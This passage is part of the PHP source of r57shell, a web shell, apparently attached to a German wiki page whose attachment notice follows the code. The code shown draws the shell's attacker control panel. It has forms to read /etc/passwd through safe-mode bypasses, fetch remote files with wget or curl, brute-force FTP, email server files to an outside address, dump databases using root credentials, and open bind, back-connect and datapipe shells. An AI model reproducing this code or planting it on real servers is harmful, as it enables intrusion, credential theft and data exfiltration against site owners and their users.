2064 echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
2065 echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2066 echo $te.'</div>'.$table_end1.$fe;
2067 }
2068 if($safe_mode&&$unix&&function_exists('mb_send_mail')){
2069 echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id22').$table_up2.div('id22').$ts;
2070 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2071 echo $te.'</div>'.$table_end1.$fe;
2072 }
2073 if($safe_mode&&function_exists('imap_list')){
2074 echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id23').$table_up2.div('id23').$ts;
2075 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2076 echo $te.'</div>'.$table_end1.$fe;
2077 }
2078 if($safe_mode&&function_exists('imap_body')){
2079 echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id24').$table_up2.div('id24').$ts;
2080 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2081 echo $te.'</div>'.$table_end1.$fe;
2082 }
2083 if($safe_mode)
2084 {
2085 echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id25').$table_up2.div('id25').$ts;
2086 echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
2087 echo sr(15,"<b>".$lang[$language.'_text117'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2088 echo $te.'</div>'.$table_end1.$fe;
2089 }
2090 if(@ini_get('file_uploads')){
2091 echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
2092 echo $table_up1.div_title($lang[$language.'_text5'],'id14').$table_up2.div('id14').$ts;
2093 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
2094 echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
2095 echo $te.'</div>'.$table_end1.$fe;
2096 }
2097 if(!$safe_mode&&$unix){
2098 echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id15').$table_up2.div('id15').$ts;
2099 echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
2100 echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
2101 echo $te.'</div>'.$table_end1.$fe;
2102 }
2103 echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id16').$table_up2.div('id16').$ts;
2104 echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
2105 $arh = $lang[$language.'_text92'];
2106 if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; }
2107 if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; }
2108 if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
2109 echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
2110 echo $te.'</div>'.$table_end1.$fe;
2111 if(@function_exists("ftp_connect")){
2112 echo $table_up1.div_title($lang[$language.'_text93'],'id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
2113 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
2114 echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
2115 echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
2116 echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
2117 echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
2118 echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
2119 echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
2120 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
2121 echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
2122 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
2123 echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
2124 echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
2125 echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
2126 echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
2127 echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
2128 echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
2129 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
2130 echo $te."</td>".$fe."</tr></div></table>";
2131 }
2132 if($unix && @function_exists("ftp_connect")){
2133 echo $fs.$table_up1.div_title($lang[$language.'_text94'],'id18').$table_up2.div('id18').$ts;
2134 echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2135 echo sr(15,"","<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
2136 echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
2137 echo $te.'</div>'.$table_end1.$fe;
2138 }
2139 if(@function_exists("mail")){
2140 echo $table_up1.div_title($lang[$language.'_text102'],'id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
2141 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
2142 echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
2143 echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
2144 echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
2145 echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
2146 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
2147 echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
2148 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
2149 echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
2150 echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
2151 echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell"))));
2152 echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
2153 echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
2154 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
2155 echo $te."</td>".$fe."</tr></div></table>";
2156 }
2157 if($mysql_on||$mssql_on||$pg_on||$ora_on)
2158 {
2159 $select = '<select name=db>';
2160 if($mysql_on) $select .= '<option>MySQL</option>';
2161 if($mssql_on) $select .= '<option>MSSQL</option>';
2162 if($pg_on) $select .= '<option>PostgreSQL</option>';
2163 if($ora_on) $select .= '<option>Oracle</option>';
2164 $select .= '</select>';
2165 echo $table_up1.div_title($lang[$language.'_text82'],'id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
2166 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
2167 echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
2168 echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
2169 echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
2170 echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
2171 echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
2172 echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
2173 echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
2174 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
2175 echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
2176 echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
2177 echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
2178 echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
2179 echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
2180 echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SELECT * FROM user; SELECT version(); select user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
2181 }
2182 if(!$safe_mode&&$unix){
2183 echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
2184 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
2185 echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
2186 echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
2187 echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
2188 echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
2189 echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
2190 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
2191 echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
2192 echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
2193 echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
2194 echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
2195 echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
2196 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
2197 echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
2198 echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
2199 echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
2200 echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
2201 echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
2202 echo $te."</td>".$fe."</tr></div></table>";
2203 }
2204 echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RST/GHC | <a href=http://rst.void.ru>http://rst.void.ru</a> | <a href=http://ghc.ru>http://ghc.ru</a> | version ".$version." ]---o</b></font></div></td></tr></table>".$f;
2205 echo '</body></html>';
2206 ?>
Gespeicherte Dateianhänge
Um Dateianhänge in eine Seite einzufügen sollte unbedingt eine Angabe wie attachment:dateiname benutzt werden, wie sie auch in der folgenden Liste der Dateien erscheint. Es sollte niemals die URL des Verweises ("laden") kopiert werden, da sich diese jederzeit ändern kann und damit der Verweis auf die Datei brechen würde.Sie dürfen keine Anhänge an diese Seite anhängen!